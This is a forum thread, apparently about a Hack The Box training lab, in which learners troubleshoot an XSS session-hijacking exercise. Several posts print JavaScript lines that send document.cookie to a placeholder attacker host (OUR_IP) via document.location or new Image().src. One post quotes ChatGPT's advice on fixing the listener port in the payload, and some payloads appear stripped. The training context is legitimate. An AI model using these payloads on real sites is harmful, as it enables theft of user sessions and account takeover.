Cross Site Scripting - Session Hijacking

Hello all, please, again I am coming to you for help. I am currently trying to get my PHP server to give my script the file it needs to find the cookie I need. I know that might have been a little confusing; DM me if you don’t get my question.

Hi bro.

Can you explain again what the issue is, with more details and what you did to solve it, please? That way we know what you’re stuck on and why.

I finally got the flag but I am stuck again LOL!!! I am stuck on the skills assessment. Please help!

OK, I don’t know what I’m doing wrong. I got the PHP server set up. I sent my payload:


I put it in the Full Name, User Name, and Image from individually and separately, and I keep getting blocked. I get activity on the server. I’m just not getting the cookie.

I’ve been hitting my head against this for a couple of days.

Have the PHP server running and I’m getting the first link back to my web server (http://myIP/script.js),
but that script isn’t opening my index.php file.

I’ve tried having document.location='http://OUR_IP/index.php?c='+document.cookie;
and the new Image().src='http://OUR_IP/index.php?c='+document.cookie;

and without the script tags with no luck either way.

Is the trick to get this to work some silly quote issue, or how can I see why the 2nd call to index.php is not going out?

Never mind. The magic was posting here.

Didn’t use “script.js” as a filename + making sure OUR_IP was actually changed. Maybe some other stuff but eventually got the index.php to be called.

I said that I can’t find the right payload.
Already tried all those listed ones…
I sent it with my tun address but they don’t request my PHP or nc server either.



I’m getting the same as @paulorcsjr. I’ve very carefully done every single step according to the steps laid out in the write-up. I think the backend of HTB is broken. Is there a way to work around the broken infrastructure? The scripts written for this exercise on the backend are failing and won’t let anyone properly finish this section.


Hey guys! Need some help too, please!
I was able to find the correct payload and got the following result:

No idea why it didn’t connect to the index.php page afterwards to get the cookie.

PS: not sure why this “(null)” is appearing after “/script.js” on the server log; the code in the file is:

new Image().src='http://OUR_IP/index.php?c='+document.cookie

And I changed it for the VM IP.

Found it.

I finally got it… Finding the payload took so much of my time, even though it turned out that it is one of the six payloads mentioned in the module (the third one). Hope this helps, and I think we need to learn more about black boxing PT.

Give me the payload please, I’ve been stuck for 3 days.

It seems that my issue was similar to yours. I asked ChatGPT for advice and received multiple answers, but the one that allowed me to successfully obtain the cookie was the last answer: “Additionally, make sure to check the port you set on your listening server. In your description, you mentioned using port 520 (sudo php -S ), but in the XSS payload, you did not specify the port ("><script src=""></script> ). Please ensure that you add the correct port in the XSS payload, as shown below: "><script src=""></script> . Therefore, please make sure that the listening port and the port in the script tag are consistent.”


Did you manage to solve this?